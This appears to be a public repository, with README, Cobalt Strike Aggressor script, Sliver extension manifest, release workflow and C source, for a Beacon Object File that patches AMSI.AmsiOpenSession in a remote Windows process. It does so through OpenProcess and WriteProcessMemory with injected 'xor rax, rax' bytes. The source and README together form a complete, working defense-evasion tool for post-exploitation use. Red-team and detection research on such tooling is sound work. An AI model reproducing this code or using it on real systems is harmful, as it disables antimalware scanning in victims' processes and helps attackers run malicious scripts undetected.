├── compiled └── .gitkeep ├── .gitignore ├── images ├── runningBof.png ├── After-AmsiOpenSession.png └── Before-Amsi-OpenSession.png ├── inject-amsiBypass.cna ├── extension.json ├── .github └── workflows │ └── autorelease.yml ├── README.md ├── beacon.h └── inject-amsiBypass.c /compiled/.gitkeep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | compiled/** -------------------------------------------------------------------------------- /images/runningBof.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sliverarmory/injectAmsiBypass/HEAD/images/runningBof.png -------------------------------------------------------------------------------- /images/After-AmsiOpenSession.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sliverarmory/injectAmsiBypass/HEAD/images/After-AmsiOpenSession.png -------------------------------------------------------------------------------- /images/Before-Amsi-OpenSession.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sliverarmory/injectAmsiBypass/HEAD/images/Before-Amsi-OpenSession.png -------------------------------------------------------------------------------- /inject-amsiBypass.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register( 2 | "inject-amsiBypass", 3 | "Bypass AMSI in a remote process with code injection.", 4 | "Synopsis: inject-amsiBypass PID" 5 | ); 6 | 7 | alias inject-amsiBypass { 8 | if(size(@_) != 2) 9 | { 10 | berror($1, "Incorrect usage!"); 11 | berror($1, beacon_command_detail("inject-amsiBypass")); 12 | return; 13 | } 14 | local('$handle $data $args'); 15 | $handle = openf(script_resource("inject-amsiBypass.o")); 16 | $data = readb($handle, -1); 17 | closef($handle); 18 | $args = bof_pack($1, "i",$2); 19 | btask($1, "Inject AMSI Bypass (@0xBoku|github.com/boku7)"); 20 | beacon_inline_execute($1, $data, "go", $args); 21 | } 22 | -------------------------------------------------------------------------------- /extension.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "Inject AMSI Bypass", 3 | "version": "v0.0.0", 4 | "command_name": "inject-amsi-bypass", 5 | "extension_author": "@moloch--", 6 | "original_author": "@boku7", 7 | "repo_url": "https://github.com/sliverarmory/injectAmsiBypass", 8 | "help": "Beacon Object File (BOF) that bypasses AMSI in a remote process with code injection.", 9 | "depends_on": "coff-loader", 10 | "entrypoint": "go", 11 | "files": [ 12 | { 13 | "os": "windows", 14 | "arch": "amd64", 15 | "path": "inject-amsiBypass.amd64.o" 16 | } 17 | ], 18 | "arguments": [ 19 | { 20 | "name": "pid", 21 | "desc": "The PID of the process you want to inject the bypass into.", 22 | "type": "int", 23 | "optional": false 24 | } 25 | ] 26 | } -------------------------------------------------------------------------------- /.github/workflows/autorelease.yml: -------------------------------------------------------------------------------- 1 | name: Release 2 | 3 | on: 4 | push: 5 | tags: ["v[0-9]+.[0-9]+.[0-9]+"] 6 | branches: ["main"] 7 | 8 | jobs: 9 | 10 | linux-windows-build: 11 | name: MinGW Build 12 | if: startsWith( github.ref, 'refs/tags/v') 13 | runs-on: ubuntu-latest 14 | timeout-minutes: 45 15 | steps: 16 | 17 | - name: OS Packages 18 | run: | 19 | sudo apt-get update --fix-missing && sudo apt-get -y install \ 20 | git build-essential zlib1g zlib1g-dev wget zip unzip \ 21 | mingw-w64 binutils-mingw-w64 g++-mingw-w64 gcc-multilib 22 | 23 | - name: Minisign 24 | run: | 25 | MINISIGN_TMP=`mktemp -d` 26 | cd $MINISIGN_TMP 27 | wget https://github.com/aead/minisign/releases/download/v0.2.0/minisign-linux-amd64.tar.gz 28 | tar xvf minisign-linux-amd64.tar.gz 29 | mv ./minisign ~/minisign 30 | 31 | - name: Check out code into the Go module directory 32 | uses: actions/checkout@v2 33 | 34 | - name: Git Fetch Tags 35 | run: git fetch --prune --unshallow --tags -f 36 | 37 | - name: Build Package 38 | run: | 39 | x86_64-w64-mingw32-gcc -c inject-amsiBypass.c -o ./compiled/inject-amsiBypass.amd64.o 40 | rm -f ./compiled/.gitkeep 41 | VERSION=$(git describe --tags --abbrev=0) 42 | cat extension.json | jq ".version |= \"$VERSION\"" > ./compiled/extension.json 43 | cd compiled 44 | tar -czvf ../inject-amsi-bypass.tar.gz . 45 | 46 | - name: Sign Package 47 | run: | 48 | touch ~/minisign.key && chmod 600 ~/minisign.key 49 | echo -e "${{ secrets.MINISIGN_PRIVATE_KEY }}" > ~/minisign.key 50 | MANIFEST=$(cat ./compiled/extension.json | base64 -w 0) 51 | bash -c "echo \"\" | ~/minisign -s ~/minisign.key -S -m ./inject-amsi-bypass.tar.gz -t \"$MANIFEST\" -x inject-amsi-bypass.minisig" 52 | 53 | - name: "Publish Release" 54 | uses: "marvinpinto/action-automatic-releases@latest" 55 | with: 56 | repo_token: "${{ secrets.GITHUB_TOKEN }}" 57 | prerelease: false 58 | files: | 59 | ./inject-amsi-bypass.minisig 60 | ./inject-amsi-bypass.tar.gz 61 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Cobalt Strike BOF - Inject AMSI Bypass 2 | Cobalt Strike Beacon Object File (BOF) that bypasses AMSI in a remote process with code injection. 3 | 4 | #### Running inject-amsiBypass BOF from CobaltStrike 5 | ![](images/runningBof.png) 6 | 7 | ### What does this do? 8 | ##### 1. Use supplied PID argument to get a handle on the remote process 9 | ```c 10 | hProc = KERNEL32$OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, (DWORD)pid); 11 | ``` 12 | ##### 2. Load AMSI.DLL into beacons memory and get the address of AMSI.AmsiOpenSession 13 | ```c 14 | hProc = KERNEL32$OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, (DWORD)pid); 15 | ``` 16 | + Both beacon and the target process will both have the same address for the symbol. 17 | + If AMSI.DLL does not exist in the remote process, running this may crash the target process. 18 | ##### 3. Write the AMSI bypass to the remote processes memory 19 | ```c 20 | unsigned char amsibypass[] = { 0x48, 0x31, 0xC0 }; // xor rax, rax 21 | BOOL success = KERNEL32$WriteProcessMemory(hProc, amsiOpenSessAddr, (PVOID)amsibypass, sizeof(amsibypass), &bytesWritten); 22 | ``` 23 | 24 | ### Method = AMSI.AmsiOpenSession 25 | + Uses the AMSI bypass technique taught in Offensive Security's PEN-300/OSEP (Evasion Techniques and Breaching Defenses) course. 26 | - https://www.offensive-security.com/pen300-osep/ 27 | 28 | ### Proof of Concept Demo Screenshots 29 | #### Before - Powershell.exe AMSI.AmsiOpenSession 30 | ![](images/Before-Amsi-OpenSession.png) 31 | 32 | #### After - Powershell.exe AMSI.AmsiOpenSession 33 | ![](images/After-AmsiOpenSession.png) 34 | 35 | ### Compile with x64 MinGW: 36 | ```bash 37 | x86_64-w64-mingw32-gcc -c inject-amsiBypass.c -o inject-amsiBypass.o 38 | ``` 39 | ### Run from Cobalt Strike Beacon Console 40 | ```bash 41 | beacon> inject-amsiBypass 42 | ``` 43 | + Make sure to load the inject-amsiBypass.cna script into Cobalt Strikes Script Manager 44 | 45 | ### To Do List 46 | + Check that AMSI.DLL exists in remote process before injection 47 | + Add other AMSI bypasses to inject 48 | + Support x86 49 | 50 | ### Credits / References 51 | ##### Raphael Mudge - Beacon Object Files - Luser Demo 52 | + https://www.youtube.com/watch?v=gfYswA_Ronw 53 | ##### Cobalt Strike - Beacon Object Files 54 | + https://www.cobaltstrike.com/help-beacon-object-files 55 | ##### BOF Code References 56 | ###### ajpc500/BOFs 57 | + https://github.com/ajpc500/BOFs/ 58 | ###### trustedsec/CS-Situational-Awareness-BOF 59 | + https://github.com/trustedsec/CS-Situational-Awareness-BOF 60 | ##### Sektor7 Malware Dev Essentials course 61 | + https://institute.sektor7.net/red-team-operator-malware-development-essentials 62 | ##### Offensive Security OSEP 63 | + https://www.offensive-security.com/pen300-osep/ 64 | -------------------------------------------------------------------------------- /beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | * 7 | * Cobalt Strike 4.1. 8 | */ 9 | 10 | /* data API */ 11 | typedef struct { 12 | char * original; /* the original buffer [so we can free it] */ 13 | char * buffer; /* current pointer into our buffer */ 14 | int length; /* remaining length of data */ 15 | int size; /* total size of this buffer */ 16 | } datap; 17 | 18 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 19 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 20 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 21 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 22 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 23 | 24 | /* format API */ 25 | typedef struct { 26 | char * original; /* the original buffer [so we can free it] */ 27 | char * buffer; /* current pointer into our buffer */ 28 | int length; /* remaining length of data */ 29 | int size; /* total size of this buffer */ 30 | } formatp; 31 | 32 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 33 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 34 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 35 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); 36 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); 37 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 38 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 39 | 40 | /* Output Functions */ 41 | #define CALLBACK_OUTPUT 0x0 42 | #define CALLBACK_OUTPUT_OEM 0x1e 43 | #define CALLBACK_ERROR 0x0d 44 | #define CALLBACK_OUTPUT_UTF8 0x20 45 | 46 | DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); 47 | DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); 48 | 49 | /* Token Functions */ 50 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 51 | DECLSPEC_IMPORT void BeaconRevertToken(); 52 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 53 | 54 | /* Spawn+Inject Functions */ 55 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 56 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); 57 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 58 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 59 | DECLSPEC_IMPORT BOOL BeaconSpawnTemporaryProcess (BOOL x86, BOOL ignoreToken, STARTUPINFO * sInfo, PROCESS_INFORMATION * pInfo); 60 | 61 | /* Utility Functions */ 62 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); -------------------------------------------------------------------------------- /inject-amsiBypass.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include "beacon.h" 3 | 4 | // Author: Bobby Cooke (@0xBoku) // SpiderLabs // github.com/boku7 // https://www.linkedin.com/in/bobby-cooke/ // https://0xboku.com 5 | 6 | WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD dwDesiredAccess, WINBOOL bInheritHandle, DWORD dwProcessId); 7 | WINBASEAPI FARPROC WINAPI KERNEL32$GetProcAddress(HMODULE hModule, LPCSTR lpProcName); 8 | WINBASEAPI WINBOOL WINAPI KERNEL32$WriteProcessMemory(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten); 9 | WINBASEAPI HMODULE WINAPI KERNEL32$LoadLibraryA(LPCSTR lpLibFileName); 10 | WINBASEAPI WINBOOL WINAPI KERNEL32$CloseHandle(HANDLE hObject); 11 | 12 | void patchAmsiOpenSession(int pid) { 13 | HANDLE hProc = NULL; 14 | SIZE_T bytesWritten; 15 | // https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess 16 | // HANDLE OpenProcess( 17 | // DWORD dwDesiredAccess, - The access to the process object. 18 | // BOOL bInheritHandle, - If this value is TRUE, processes created by this process will inherit the handle. 19 | // DWORD dwProcessId - The identifier of the local process to be opened. 20 | // ); 21 | // https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights 22 | // PROCESS_VM_OPERATION (0x0008) Required to perform an operation on the address space of a process 23 | // PROCESS_VM_WRITE (0x0020) Required to write to memory in a process using WriteProcessMemory. 24 | // Takes the PID supplied and opens a handle to that process 25 | hProc = KERNEL32$OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, (DWORD)pid); 26 | // Loads AMSI.DLL into the beacons memory and resolves the address of the AmsiOpenSession symbol 27 | // The addresses of the symbols for DLLs are the same across all processes 28 | PVOID amsiOpenSessAddr = KERNEL32$GetProcAddress(KERNEL32$LoadLibraryA("amsi.dll"), "AmsiOpenSession"); 29 | // This is the payload we will inject into the start of the AmsiOpenSession symbol within the target process 30 | unsigned char amsibypass[] = { 0x48, 0x31, 0xC0 }; // xor rax, rax 31 | // Write the AMSI bypass payload to the remote process 32 | BOOL success = KERNEL32$WriteProcessMemory(hProc, amsiOpenSessAddr, (PVOID)amsibypass, sizeof(amsibypass), &bytesWritten); 33 | KERNEL32$CloseHandle(hProc); 34 | if (success) { 35 | BeaconPrintf(CALLBACK_OUTPUT, "Success - Patched AMSI.AmsiOpenSession in remote process: PID:%d",pid); 36 | } 37 | else { 38 | BeaconPrintf(CALLBACK_OUTPUT, "Fail - Could not patch AMSI.AmsiOpenSession in remote process: PID:%d", pid); 39 | } 40 | } 41 | void go(char * args, int len) { 42 | datap parser; 43 | DWORD pid; 44 | BeaconDataParse(&parser, args, len); 45 | pid = BeaconDataInt(&parser); 46 | BeaconPrintf(CALLBACK_OUTPUT, "Attempting to patch AMSI in remote process with PID: %d", pid); 47 | patchAmsiOpenSession(pid); 48 | } 49 | --------------------------------------------------------------------------------